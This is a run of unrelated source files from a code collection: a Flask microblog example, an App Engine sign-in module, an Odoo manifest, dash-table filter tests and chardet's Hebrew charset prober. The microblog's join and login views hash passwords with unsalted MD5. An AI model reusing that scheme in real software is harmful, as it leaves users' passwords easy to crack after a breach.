@app.before_request
def before_request():
g.db = database
g.db.connect()
@app.after_request
def after_request(response):
g.db.close()
return response
# views -- these are the actual mappings of url to view function
@app.route('/')
def homepage():
# depending on whether the requesting user is logged in or not, show them
# either the public timeline or their own private timeline
if session.get('logged_in'):
return private_timeline()
else:
return public_timeline()
@app.route('/private/')
def private_timeline():
# the private timeline exemplifies the use of a subquery -- we are asking for
# messages where the person who created the message is someone the current
# user is following. these messages are then ordered newest-first.
user = get_current_user()
messages = (Message
.select()
.where(Message.user << user.following())
.order_by(Message.pub_date.desc()))
return object_list('private_messages.html', messages, 'message_list')
@app.route('/public/')
def public_timeline():
# simply display all messages, newest first
messages = Message.select().order_by(Message.pub_date.desc())
return object_list('public_messages.html', messages, 'message_list')
@app.route('/join/', methods=['GET', 'POST'])
def join():
if request.method == 'POST' and request.form['username']:
try:
with database.atomic():
# Attempt to create the user. If the username is taken, due to the
# unique constraint, the database will raise an IntegrityError.
user = User.create(
username=request.form['username'],
password=md5((request.form['password']).encode('utf-8')).hexdigest(),
email=request.form['email'],
join_date=datetime.datetime.now())
# mark the user as being 'authenticated' by setting the session vars
auth_user(user)
return redirect(url_for('homepage'))
except IntegrityError:
flash('That username is already taken')
return render_template('join.html')
@app.route('/login/', methods=['GET', 'POST'])
def login():
if request.method == 'POST' and request.form['username']:
try:
pw_hash = md5(request.form['password'].encode('utf-8')).hexdigest()
user = User.get(
(User.username == request.form['username']) &
(User.password == pw_hash))
except User.DoesNotExist:
flash('The password entered is incorrect')
else:
auth_user(user)
return redirect(url_for('homepage'))
return render_template('login.html')
@app.route('/logout/')
def logout():
session.pop('logged_in', None)
flash('You were logged out')
return redirect(url_for('homepage'))
@app.route('/following/')
@login_required
def following():
user = get_current_user()
return object_list('user_following.html', user.following(), 'user_list')
@app.route('/followers/')
@login_required
def followers():
user = get_current_user()
return object_list('user_followers.html', user.followers(), 'user_list')
@app.route('/users/')
def user_list():
users = User.select().order_by(User.username)
return object_list('user_list.html', users, 'user_list')
@app.route('/users/<username>/')
def user_detail(username):
# using the "get_object_or_404" shortcut here to get a user with a valid
# username or short-circuit and display a 404 if no user exists in the db
user = get_object_or_404(User, User.username == username)
# get all the users messages ordered newest-first -- note how we're accessing
# the messages -- user.message_set. could also have written it as:
# Message.select().where(Message.user == user)
messages = user.messages.order_by(Message.pub_date.desc())
return object_list('user_detail.html', messages, 'message_list', user=user)
@app.route('/users/<username>/follow/', methods=['POST'])
@login_required
def user_follow(username):
user = get_object_or_404(User, User.username == username)
try:
with database.atomic():
Relationship.create(
from_user=get_current_user(),
to_user=user)
except IntegrityError:
pass
flash('You are following %s' % user.username)
return redirect(url_for('user_detail', username=user.username))
@app.route('/users/<username>/unfollow/', methods=['POST'])
@login_required
def user_unfollow(username):
user = get_object_or_404(User, User.username == username)
(Relationship
.delete()
.where(
(Relationship.from_user == get_current_user()) &
(Relationship.to_user == user))
.execute())
flash('You are no longer following %s' % user.username)
return redirect(url_for('user_detail', username=user.username))
@app.route('/create/', methods=['GET', 'POST'])
@login_required
def create():
user = get_current_user()
if request.method == 'POST' and request.form['content']:
message = Message.create(
user=user,
content=request.form['content'],
pub_date=datetime.datetime.now())
flash('Your message has been created')
return redirect(url_for('user_detail', username=user.username))
return render_template('create.html')
@app.context_processor
def _inject_user():
return {'current_user': get_current_user()}
# allow running from the command line
if __name__ == '__main__':
create_tables()
app.run()
|
gmist/fix-5studio
|
refs/heads/master
|
main/auth/auth.py
|
4
|
# coding: utf-8
from __future__ import absolute_import
import functools
import re
from flask_oauthlib import client as oauth
from google.appengine.ext import ndb
import flask
import flask_login
import flask_wtf
import unidecode
import wtforms
import cache
import config
import model
import task
import util
from main import app
_signals = flask.signals.Namespace()
###############################################################################
# Flask Login
###############################################################################
login_manager = flask_login.LoginManager()
class AnonymousUser(flask_login.AnonymousUserMixin):
id = 0
admin = False
name = 'Anonymous'
user_db = None
def key(self):
return None
def has_permission(self, permission):
return False
login_manager.anonymous_user = AnonymousUser
class FlaskUser(AnonymousUser):
def __init__(self, user_db):
self.user_db = user_db
self.id = user_db.key.id()
self.name = user_db.name
self.admin = user_db.admin
def key(self):
return self.user_db.key.urlsafe()
def get_id(self):
return self.user_db.key.urlsafe()
def is_authenticated(self):
return True
def is_active(self):
return self.user_db.active
def is_anonymous(self):
return False
def has_permission(self, permission):
return self.user_db.has_permission(permission)
@login_manager.user_loader
def load_user(key):
user_db = ndb.Key(urlsafe=key).get()
if user_db:
return FlaskUser(user_db)
return None
login_manager.init_app(app)
def current_user_id():
return flask_login.current_user.id
def current_user_key():
return flask_login.current_user.user_db.key \
if flask_login.current_user.user_db else None
def current_user_db():
return flask_login.current_user.user_db
def is_logged_in():
return flask_login.current_user.id != 0
###############################################################################
# Decorators
###############################################################################
def login_required(f):
decorator_order_guard(f, 'auth.login_required')
@functools.wraps(f)
def decorated_function(*args, **kwargs):
if is_logged_in():
return f(*args, **kwargs)
if flask.request.path.startswith('/api/'):
return flask.abort(401)
return flask.redirect(flask.url_for('signin', next=flask.request.url))
return decorated_function
def admin_required(f):
decorator_order_guard(f, 'auth.admin_required')
@functools.wraps(f)
def decorated_function(*args, **kwargs):
if is_logged_in() and current_user_db().admin:
return f(*args, **kwargs)
if not is_logged_in() and flask.request.path.startswith('/api/'):
return flask.abort(401)
if not is_logged_in():
return flask.redirect(flask.url_for('signin', next=flask.request.url))
return flask.abort(403)
return decorated_function
def cron_required(f):
decorator_order_guard(f, 'auth.cron_required')
@functools.wraps(f)
def decorated_function(*args, **kwargs):
if 'X-Appengine-Cron' in flask.request.headers:
return f(*args, **kwargs)
if is_logged_in() and current_user_db().admin:
return f(*args, **kwargs)
if not is_logged_in():
return flask.redirect(flask.url_for('signin', next=flask.request.url))
return flask.abort(403)
return decorated_function
permission_registered = _signals.signal('permission-registered')
def permission_required(permission=None, methods=None):
def permission_decorator(f):
decorator_order_guard(f, 'auth.permission_required')
# default to decorated function name as permission
perm = permission or f.func_name
meths = [m.upper() for m in methods] if methods else None
permission_registered.send(f, permission=perm)
@functools.wraps(f)
def decorated_function(*args, **kwargs):
if meths and flask.request.method.upper() not in meths:
return f(*args, **kwargs)
if is_logged_in() and current_user_db().has_permission(perm):
return f(*args, **kwargs)
if not is_logged_in():
if flask.request.path.startswith('/api/'):
return flask.abort(401)
return flask.redirect(flask.url_for('signin', next=flask.request.url))
return flask.abort(403)
return decorated_function
return permission_decorator
###############################################################################
# Sign in stuff
###############################################################################
class SignInForm(flask_wtf.FlaskForm):
email = wtforms.StringField(
'Email',
[wtforms.validators.required()],
filters=[util.email_filter],
)
password = wtforms.StringField(
'Password',
[wtforms.validators.required()],
)
remember = wtforms.BooleanField(
'Keep me signed in',
[wtforms.validators.optional()],
)
recaptcha = flask_wtf.RecaptchaField()
next_url = wtforms.HiddenField()
@app.route('/signin/', methods=['GET', 'POST'])
def signin():
next_url = util.get_next_url()
form = None
if config.CONFIG_DB.has_email_authentication:
form = form_with_recaptcha(SignInForm())
save_request_params()
if form.validate_on_submit():
result = get_user_db_from_email(form.email.data, form.password.data)
if result:
cache.reset_auth_attempt()
return signin_user_db(result)
if result is None:
form.email.errors.append('Email or Password do not match')
if result is False:
return flask.redirect(flask.url_for('welcome'))
if not form.errors:
form.next_url.data = next_url
if form and form.errors:
cache.bump_auth_attempt()
return flask.render_template(
'auth/auth.html',
title='Sign in',
html_class='auth',
next_url=next_url,
form=form,
form_type='signin' if config.CONFIG_DB.has_email_authentication else '',
**urls_for_oauth(next_url)
)
###############################################################################
# Sign up stuff
###############################################################################
class SignUpForm(flask_wtf.FlaskForm):
email = wtforms.StringField(
'Email',
[wtforms.validators.required(), wtforms.validators.email()],
filters=[util.email_filter],
)
recaptcha = flask_wtf.RecaptchaField()
@app.route('/signup/', methods=['GET', 'POST'])
def signup():
next_url = util.get_next_url()
form = None
if config.CONFIG_DB.has_email_authentication:
form = form_with_recaptcha(SignUpForm())
save_request_params()
if form.validate_on_submit():
user_db = model.User.get_by('email', form.email.data)
if user_db:
form.email.errors.append('This email is already taken.')
if not form.errors:
user_db = create_user_db(
None,
util.create_name_from_email(form.email.data),
form.email.data,
form.email.data,
)
user_db.put()
task.activate_user_notification(user_db)
cache.bump_auth_attempt()
return flask.redirect(flask.url_for('welcome'))
if form and form.errors:
cache.bump_auth_attempt()
title = 'Sign up' if config.CONFIG_DB.has_email_authentication else 'Sign in'
return flask.render_template(
'auth/auth.html',
title=title,
html_class='auth',
next_url=next_url,
form=form,
**urls_for_oauth(next_url)
)
###############################################################################
# Sign out stuff
###############################################################################
@app.route('/signout/')
def signout():
flask_login.logout_user()
return flask.redirect(util.param('next') or flask.url_for('signin'))
###############################################################################
# Helpers
###############################################################################
def url_for_signin(service_name, next_url):
return flask.url_for('signin_%s' % service_name, next=next_url)
def urls_for_oauth(next_url):
return {
'azure_ad_signin_url': url_for_signin('azure_ad', next_url),
'bitbucket_signin_url': url_for_signin('bitbucket', next_url),
'dropbox_signin_url': url_for_signin('dropbox', next_url),
'facebook_signin_url': url_for_signin('facebook', next_url),
'github_signin_url': url_for_signin('github', next_url),
'google_signin_url': url_for_signin('google', next_url),
'gae_signin_url': url_for_signin('gae', next_url),
'instagram_signin_url': url_for_signin('instagram', next_url),
'linkedin_signin_url': url_for_signin('linkedin', next_url),
'mailru_signin_url': url_for_signin('mailru', next_url),
'microsoft_signin_url': url_for_signin('microsoft', next_url),
'reddit_signin_url': url_for_signin('reddit', next_url),
'twitter_signin_url': url_for_signin('twitter', next_url),
'vk_signin_url': url_for_signin('vk', next_url),
'yahoo_signin_url': url_for_signin('yahoo', next_url),
}
def create_oauth_app(service_config, name):
upper_name = name.upper()
app.config[upper_name] = service_config
service_oauth = oauth.OAuth()
service_app = service_oauth.remote_app(name, app_key=upper_name)
service_oauth.init_app(app)
return service_app
def decorator_order_guard(f, decorator_name):
if f in app.view_functions.values():
raise SyntaxError(
'Do not use %s above app.route decorators as it would not be checked. '
'Instead move the line below the app.route lines.' % decorator_name
)
def save_request_params():
flask.session['auth-params'] = {
'next': util.get_next_url(),
'remember': util.param('remember'),
}
def signin_oauth(oauth_app, scheme=None):
try:
flask.session.pop('oauth_token', None)
save_request_params()
return oauth_app.authorize(callback=flask.url_for(
'%s_authorized' % oauth_app.name, _external=True, _scheme=scheme
))
except oauth.OAuthException:
flask.flash(
'Something went wrong with sign in. Please try again.',
category='danger',
)
return flask.redirect(flask.url_for('signin', next=util.get_next_url()))
def form_with_recaptcha(form):
should_have_recaptcha = cache.get_auth_attempt() >= config.RECAPTCHA_LIMIT
if not (should_have_recaptcha and config.CONFIG_DB.has_recaptcha):
del form.recaptcha
return form
###############################################################################
# User related stuff
###############################################################################
def create_user_db(auth_id, name, username, email='', verified=False, **props):
email = email.lower() if email else ''
if verified and email:
user_dbs, cursors = model.User.get_dbs(email=email, verified=True, limit=2)
if len(user_dbs) == 1:
user_db = user_dbs[0]
user_db.auth_ids.append(auth_id)
user_db.put()
task.new_user_notification(user_db)
return user_db
if isinstance(username, str):
username = username.decode('utf-8')
username = unidecode.unidecode(username.split('@')[0].lower()).strip()
username = re.sub(r'[\W_]+', '.', username)
new_username = username
n = 1
while not model.User.is_username_available(new_username):
new_username = '%s%d' % (username, n)
n += 1
user_db = model.User(
name=name,
email=email,
username=new_username,
auth_ids=[auth_id] if auth_id else [],
verified=verified,
token=util.uuid(),
**props
)
user_db.put()
task.new_user_notification(user_db)
return user_db
@ndb.toplevel
def signin_user_db(user_db):
if not user_db:
return flask.redirect(flask.url_for('signin'))
flask_user_db = FlaskUser(user_db)
auth_params = flask.session.get('auth-params', {
'next': flask.url_for('welcome'),
'remember': False,
})
flask.session.pop('auth-params', None)
if flask_login.login_user(flask_user_db, remember=auth_params['remember']):
user_db.put_async()
return flask.redirect(util.get_next_url(auth_params['next']))
flask.flash('Sorry, but you could not sign in.', category='danger')
return flask.redirect(flask.url_for('signin'))
def get_user_db_from_email(email, password):
user_dbs, cursors = model.User.get_dbs(email=email, active=True, limit=2)
if not user_dbs:
return None
if len(user_dbs) > 1:
flask.flash('''We are sorry but it looks like there is a conflict with
your account. Our support team has been informed and we will get
back to you as soon as possible.''', category='danger')
task.email_conflict_notification(email)
return False
user_db = user_dbs[0]
if user_db.password_hash == util.password_hash(user_db, password):
return user_db
return None
|
odoocn/odoomrp-wip
|
refs/heads/8.0
|
sale_order_recalculate_prices_variants/__openerp__.py
|
17
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
##############################################################################
{
"name": "Sale Order Recalculate Prices - Variants extension",
"version": "1.0",
"depends": [
"sale_order_recalculate_prices",
"sale_product_variants",
],
"author": "OdooMRP team,"
"AvanzOSC,"
"Serv. Tecnol. Avanzados - Pedro M. Baeza",
"website": "http://www.odoomrp.com",
"contributors": [
"Oihane Crucelaegui <oihanecrucelaegi@avanzosc.es>",
"Pedro M. Baeza <pedro.baeza@serviciosbaeza.com>",
"Ana Juaristi <ajuaristio@gmail.com>"
],
"category": "Hidden/Dependency",
"summary": "",
"installable": True,
"auto_install": True,
}
|
plotly/dash-table
|
refs/heads/dev
|
tests/selenium/test_filter.py
|
1
|
import dash
from dash_table import DataTable
import pytest
DATA_SIZE = 50
def get_table_defaults():
return dict(
id="table",
data=[
dict(a=1, b=11, c=111),
dict(a=2, b=12, c=113),
dict(a=3, b=14, c=116),
dict(a=4, b=17, c=120),
dict(a=5, b=21, c=125),
],
columns=[
dict(id="a", name="a"),
dict(id="b", name="b"),
dict(id="c", name="c"),
],
)
def get_native_table():
props = get_table_defaults()
props["filter_action"] = "native"
return props
def get_native_and_table():
props = get_table_defaults()
props["filter_action"] = dict(type="native", operator="and")
return props
def get_native_or_table():
props = get_table_defaults()
props["filter_action"] = dict(type="native", operator="or")
return props
def get_app(props):
app = dash.Dash(__name__)
app.layout = DataTable(**props)
return app
@pytest.mark.parametrize(
"props,expect",
[
(get_native_table(), ["4"]),
(get_native_and_table(), ["4"]),
(get_native_or_table(), ["1", "3", "4", "5"]),
],
)
def test_filt001_basic(test, props, expect):
test.start_server(get_app(props))
target = test.table("table")
target.column("a").filter_value("gt 3")
target.column("b").filter_value("is prime")
target.column("c").filter_value("ne 113")
target.column("a").filter_click()
for index, value in enumerate(expect):
assert target.cell(index, "a").get_text() == value
assert test.get_log_errors() == []
@pytest.mark.parametrize(
"filter_options,column_filter_options",
[
("sensitive", None),
("sensitive", None),
("sensitive", None),
("insensitive", None),
("sensitive", "insensitive"),
("insensitive", "sensitive"),
],
)
def test_filt002_sensitivity(test, filter_options, column_filter_options):
props = dict(
id="table",
data=[dict(a="abc", b="abc", c="abc"), dict(a="ABC", b="ABC", c="ABC")],
columns=[
dict(
id="a",
name="a",
filter_options=dict(case=column_filter_options)
if column_filter_options is not None
else None,
type="any",
),
dict(
id="b",
name="b",
filter_options=dict(case=column_filter_options)
if column_filter_options is not None
else None,
type="text",
),
dict(
id="c",
name="c",
filter_options=dict(case=column_filter_options)
if column_filter_options is not None
else None,
type="numeric",
),
],
filter_action="native",
filter_options=dict(case=filter_options)
if filter_options is not None
else None,
style_cell=dict(width=100, min_width=100, max_width=100),
)
sensitivity = (
filter_options if column_filter_options is None else column_filter_options
)
test.start_server(get_app(props))
target = test.table("table")
# any -> implicit contains
target.column("a").filter_value("A")
if sensitivity == "sensitive":
assert target.cell(0, "a").get_text() == "ABC"
assert not target.cell(1, "a").exists()
else:
assert target.cell(0, "a").get_text() == "abc"
assert target.cell(1, "a").get_text() == "ABC"
target.column("a").filter_value("a")
if sensitivity == "sensitive":
assert target.cell(0, "a").get_text() == "abc"
assert not target.cell(1, "a").exists()
else:
assert target.cell(0, "a").get_text() == "abc"
assert target.cell(1, "a").get_text() == "ABC"
# text -> implicit contains
target.column("a").filter_value("")
target.column("b").filter_value("A")
if sensitivity == "sensitive":
assert target.cell(0, "b").get_text() == "ABC"
assert not target.cell(1, "b").exists()
else:
assert target.cell(0, "b").get_text() == "abc"
assert target.cell(1, "b").get_text() == "ABC"
target.column("b").filter_value("a")
if sensitivity == "sensitive":
assert target.cell(0, "b").get_text() == "abc"
assert not target.cell(1, "b").exists()
else:
assert target.cell(0, "b").get_text() == "abc"
assert target.cell(1, "b").get_text() == "ABC"
# numeric -> implicit equal
target.column("b").filter_value("")
target.column("c").filter_value("A")
assert not target.cell(0, "c").exists()
target.column("c").filter_value("a")
assert not target.cell(0, "c").exists()
target.column("c").filter_value("ABC")
if sensitivity == "sensitive":
assert target.cell(0, "c").get_text() == "ABC"
assert not target.cell(1, "c").exists()
else:
assert target.cell(0, "c").get_text() == "abc"
assert target.cell(1, "c").get_text() == "ABC"
target.column("c").filter_value("abc")
if sensitivity == "sensitive":
assert target.cell(0, "c").get_text() == "abc"
assert not target.cell(1, "c").exists()
else:
assert target.cell(0, "c").get_text() == "abc"
assert target.cell(1, "c").get_text() == "ABC"
@pytest.mark.parametrize(
"filter_options,column_filter_options",
[
("sensitive", None),
("sensitive", None),
("sensitive", None),
("insensitive", None),
("sensitive", "insensitive"),
("insensitive", "sensitive"),
],
)
def test_filt003_sensitivity(test, filter_options, column_filter_options):
props = dict(
id="table",
data=[dict(a="abc", b="abc", c="abc"), dict(a="ABC", b="ABC", c="ABC")],
columns=[
dict(
id="a",
name="a",
filter_options=dict(case=column_filter_options)
if column_filter_options is not None
else None,
type="any",
),
dict(
id="b",
name="b",
filter_options=dict(case=column_filter_options)
if column_filter_options is not None
else None,
type="text",
),
dict(
id="c",
name="c",
filter_options=dict(case=column_filter_options)
if column_filter_options is not None
else None,
type="numeric",
),
],
filter_action="native",
filter_options=dict(case=filter_options)
if filter_options is not None
else None,
style_cell=dict(width=100, min_width=100, max_width=100),
)
sensitivity = (
filter_options if column_filter_options is None else column_filter_options
)
test.start_server(get_app(props))
target = test.table("table")
target.column("a").filter_value("contains A")
if sensitivity == "sensitive":
assert target.cell(0, "a").get_text() == "ABC"
assert not target.cell(1, "a").exists()
else:
assert target.cell(0, "a").get_text() == "abc"
assert target.cell(1, "a").get_text() == "ABC"
target.column("a").filter_value("contains a")
if sensitivity == "sensitive":
assert target.cell(0, "a").get_text() == "abc"
assert not target.cell(1, "a").exists()
else:
assert target.cell(0, "a").get_text() == "abc"
assert target.cell(1, "a").get_text() == "ABC"
target.column("a").filter_value("")
target.column("b").filter_value("contains A")
if sensitivity == "sensitive":
assert target.cell(0, "b").get_text() == "ABC"
assert not target.cell(1, "b").exists()
else:
assert target.cell(0, "b").get_text() == "abc"
assert target.cell(1, "b").get_text() == "ABC"
target.column("b").filter_value("contains a")
if sensitivity == "sensitive":
assert target.cell(0, "b").get_text() == "abc"
assert not target.cell(1, "b").exists()
else:
assert target.cell(0, "b").get_text() == "abc"
assert target.cell(1, "b").get_text() == "ABC"
target.column("b").filter_value("")
target.column("c").filter_value("contains A")
if sensitivity == "sensitive":
assert target.cell(0, "c").get_text() == "ABC"
assert not target.cell(1, "c").exists()
else:
assert target.cell(0, "c").get_text() == "abc"
assert target.cell(1, "c").get_text() == "ABC"
target.column("c").filter_value("contains a")
if sensitivity == "sensitive":
assert target.cell(0, "c").get_text() == "abc"
assert not target.cell(1, "c").exists()
else:
assert target.cell(0, "c").get_text() == "abc"
assert target.cell(1, "c").get_text() == "ABC"
|
krismcfarlin/todo_angular_endpoints
|
refs/heads/master
|
bp_includes/external/requests/packages/chardet/hebrewprober.py
|
2928
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Shy Shalom
# Portions created by the Initial Developer are Copyright (C) 2005
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .charsetprober import CharSetProber
from .constants import eNotMe, eDetecting
from .compat import wrap_ord
# This prober doesn't actually recognize a language or a charset.
# It is a helper prober for the use of the Hebrew model probers
### General ideas of the Hebrew charset recognition ###
#
# Four main charsets exist in Hebrew:
# "ISO-8859-8" - Visual Hebrew
# "windows-1255" - Logical Hebrew
# "ISO-8859-8-I" - Logical Hebrew
# "x-mac-hebrew" - ?? Logical Hebrew ??
#
# Both "ISO" charsets use a completely identical set of code points, whereas
# "windows-1255" and "x-mac-hebrew" are two different proper supersets of
# these code points. windows-1255 defines additional characters in the range
# 0x80-0x9F as some misc punctuation marks as well as some Hebrew-specific
# diacritics and additional 'Yiddish' ligature letters in the range 0xc0-0xd6.
# x-mac-hebrew defines similar additional code points but with a different
# mapping.
#
# As far as an average Hebrew text with no diacritics is concerned, all four
# charsets are identical with respect to code points. Meaning that for the
# main Hebrew alphabet, all four map the same values to all 27 Hebrew letters
# (including final letters).
#
# The dominant difference between these charsets is their directionality.
# "Visual" directionality means that the text is ordered as if the renderer is
# not aware of a BIDI rendering algorithm. The renderer sees the text and
# draws it from left to right. The text itself when ordered naturally is read
# backwards. A buffer of Visual Hebrew generally looks like so:
# "[last word of first line spelled backwards] [whole line ordered backwards
# and spelled backwards] [first word of first line spelled backwards]
# [end of line] [last word of second line] ... etc' "
# adding punctuation marks, numbers and English text to visual text is
# naturally also "visual" and from left to right.
#
# "Logical" directionality means the text is ordered "naturally" according to
# the order it is read. It is the responsibility of the renderer to display
# the text from right to left. A BIDI algorithm is used to place general
# punctuation marks, numbers and English text in the text.
#
# Texts in x-mac-hebrew are almost impossible to find on the Internet. From
# what little evidence I could find, it seems that its general directionality
# is Logical.
#
# To sum up all of the above, the Hebrew probing mechanism knows about two
# charsets:
# Visual Hebrew - "ISO-8859-8" - backwards text - Words and sentences are
# backwards while line order is natural. For charset recognition purposes
# the line order is unimportant (In fact, for this implementation, even
# word order is unimportant).
# Logical Hebrew - "windows-1255" - normal, naturally ordered text.
#
# "ISO-8859-8-I" is a subset of windows-1255 and doesn't need to be
# specifically identified.
# "x-mac-hebrew" is also identified as windows-1255. A text in x-mac-hebrew
# that contain special punctuation marks or diacritics is displayed with
# some unconverted characters showing as question marks. This problem might
# be corrected using another model prober for x-mac-hebrew. Due to the fact
# that x-mac-hebrew texts are so rare, writing another model prober isn't
# worth the effort and performance hit.
#
#### The Prober ####
#
# The prober is divided between two SBCharSetProbers and a HebrewProber,
# all of which are managed, created, fed data, inquired and deleted by the
# SBCSGroupProber. The two SBCharSetProbers identify that the text is in
# fact some kind of Hebrew, Logical or Visual. The final decision about which
# one is it is made by the HebrewProber by combining final-letter scores
# with the scores of the two SBCharSetProbers to produce a final answer.
#
# The SBCSGroupProber is responsible for stripping the original text of HTML
# tags, English characters, numbers, low-ASCII punctuation characters, spaces
# and new lines. It reduces any sequence of such characters to a single space.
# The buffer fed to each prober in the SBCS group prober is pure text in
# high-ASCII.
# The two SBCharSetProbers (model probers) share the same language model:
# Win1255Model.
# The first SBCharSetProber uses the model normally as any other
# SBCharSetProber does, to recognize windows-1255, upon which this model was
# built. The second SBCharSetProber is told to make the pair-of-letter
# lookup in the language model backwards. This in practice exactly simulates
# a visual Hebrew model using the windows-1255 logical Hebrew model.
#
# The HebrewProber is not using any language model. All it does is look for
# final-letter evidence suggesting the text is either logical Hebrew or visual
# Hebrew. Disjointed from the model probers, the results of the HebrewProber
# alone are meaningless. HebrewProber always returns 0.00 as confidence
# since it never identifies a charset by itself. Instead, the pointer to the
# HebrewProber is passed to the model probers as a helper "Name Prober".
# When the Group prober receives a positive identification from any prober,
# it asks for the name of the charset identified. If the prober queried is a
# Hebrew model prober, the model prober forwards the call to the
# HebrewProber to make the final decision. In the HebrewProber, the
# decision is made according to the final-letters scores maintained and Both
# model probers scores. The answer is returned in the form of the name of the
# charset identified, either "windows-1255" or "ISO-8859-8".
# windows-1255 / ISO-8859-8 code points of interest
FINAL_KAF = 0xea
NORMAL_KAF = 0xeb
FINAL_MEM = 0xed
NORMAL_MEM = 0xee
FINAL_NUN = 0xef
NORMAL_NUN = 0xf0
FINAL_PE = 0xf3
NORMAL_PE = 0xf4
FINAL_TSADI = 0xf5
NORMAL_TSADI = 0xf6
# Minimum Visual vs Logical final letter score difference.
# If the difference is below this, don't rely solely on the final letter score
# distance.
MIN_FINAL_CHAR_DISTANCE = 5
# Minimum Visual vs Logical model score difference.
# If the difference is below this, don't rely at all on the model score
# distance.
MIN_MODEL_DISTANCE = 0.01
VISUAL_HEBREW_NAME = "ISO-8859-8"
LOGICAL_HEBREW_NAME = "windows-1255"
class HebrewProber(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mLogicalProber = None
self._mVisualProber = None
self.reset()
def reset(self):
self._mFinalCharLogicalScore = 0
self._mFinalCharVisualScore = 0
# The two last characters seen in the previous buffer,
# mPrev and mBeforePrev are initialized to space in order to simulate
# a word delimiter at the beginning of the data
self._mPrev = ' '
self._mBeforePrev = ' '
# These probers are owned by the group prober.
def set_model_probers(self, logicalProber, visualProber):
self._mLogicalProber = logicalProber
self._mVisualProber = visualProber
def is_final(self, c):
return wrap_ord(c) in [FINAL_KAF, FINAL_MEM, FINAL_NUN, FINAL_PE,
FINAL_TSADI]
def is_non_final(self, c):
# The normal Tsadi is not a good Non-Final letter due to words like
# 'lechotet' (to chat) containing an apostrophe after the tsadi. This
# apostrophe is converted to a space in FilterWithoutEnglishLetters
# causing the Non-Final tsadi to appear at an end of a word even
# though this is not the case in the original text.
# The letters Pe and Kaf rarely display a related behavior of not being
# a good Non-Final letter. Words like 'Pop', 'Winamp' and 'Mubarak'
# for example legally end with a Non-Final Pe or Kaf. However, the
# benefit of these letters as Non-Final letters outweighs the damage
# since these words are quite rare.
return wrap_ord(c) in [NORMAL_KAF, NORMAL_MEM, NORMAL_NUN, NORMAL_PE]
def feed(self, aBuf):
# Final letter analysis for logical-visual decision.
# Look for evidence that the received buffer is either logical Hebrew
# or visual Hebrew.
# The following cases are checked:
# 1) A word longer than 1 letter, ending with a final letter. This is
# an indication that the text is laid out "naturally" since the
# final letter really appears at the end. +1 for logical score.
# 2) A word longer than 1 letter, ending with a Non-Final letter. In
# normal Hebrew, words ending with Kaf, Mem, Nun, Pe or Tsadi,
# should not end with the Non-Final form of that letter. Exceptions
# to this rule are mentioned above in isNonFinal(). This is an
# indication that the text is laid out backwards. +1 for visual
# score
# 3) A word longer than 1 letter, starting with a final letter. Final
# letters should not appear at the beginning of a word. This is an
# indication that the text is laid out backwards. +1 for visual
# score.
#
# The visual score and logical score are accumulated throughout the
# text and are finally checked against each other in GetCharSetName().
# No checking for final letters in the middle of words is done since
# that case is not an indication for either Logical or Visual text.
#
# We automatically filter out all 7-bit characters (replace them with
# spaces) so the word boundary detection works properly. [MAP]
if self.get_state() == eNotMe:
# Both model probers say it's not them. No reason to continue.
return eNotMe
aBuf = self.filter_high_bit_only(aBuf)
for cur in aBuf:
if cur == ' ':
# We stand on a space - a word just ended
if self._mBeforePrev != ' ':
# next-to-last char was not a space so self._mPrev is not a
# 1 letter word
if self.is_final(self._mPrev):
# case (1) [-2:not space][-1:final letter][cur:space]
self._mFinalCharLogicalScore += 1
elif self.is_non_final(self._mPrev):
# case (2) [-2:not space][-1:Non-Final letter][
# cur:space]
self._mFinalCharVisualScore += 1
else:
# Not standing on a space
if ((self._mBeforePrev == ' ') and
(self.is_final(self._mPrev)) and (cur != ' ')):
# case (3) [-2:space][-1:final letter][cur:not space]
self._mFinalCharVisualScore += 1
self._mBeforePrev = self._mPrev
self._mPrev = cur
# Forever detecting, till the end or until both model probers return
# eNotMe (handled above)
return eDetecting
def get_charset_name(self):
# Make the decision: is it Logical or Visual?
# If the final letter score distance is dominant enough, rely on it.
finalsub = self._mFinalCharLogicalScore - self._mFinalCharVisualScore
if finalsub >= MIN_FINAL_CHAR_DISTANCE:
return LOGICAL_HEBREW_NAME
if finalsub <= -MIN_FINAL_CHAR_DISTANCE:
return VISUAL_HEBREW_NAME
# It's not dominant enough, try to rely on the model scores instead.
modelsub = (self._mLogicalProber.get_confidence()
- self._mVisualProber.get_confidence())
if modelsub > MIN_MODEL_DISTANCE:
return LOGICAL_HEBREW_NAME
if modelsub < -MIN_MODEL_DISTANCE:
return VISUAL_HEBREW_NAME
# Still no good, back to final letter distance, maybe it'll save the
# day.
if finalsub < 0.0:
return VISUAL_HEBREW_NAME
# (finalsub > 0 - Logical) or (don't know what to do) default to
# Logical.
return LOGICAL_HEBREW_NAME
def get_state(self):
# Remain active as long as any of the model probers are active.
if (self._mLogicalProber.get_state() == eNotMe) and \
(self._mVisualProber.get_state() == eNotMe):
return eNotMe
return eDetecting
|
EIngram/GarageDoor
|
refs/heads/master
|
Lambda_Function/requests/packages/chardet/hebrewprober.py
|
2928
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Shy Shalom
# Portions created by the Initial Developer are Copyright (C) 2005
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
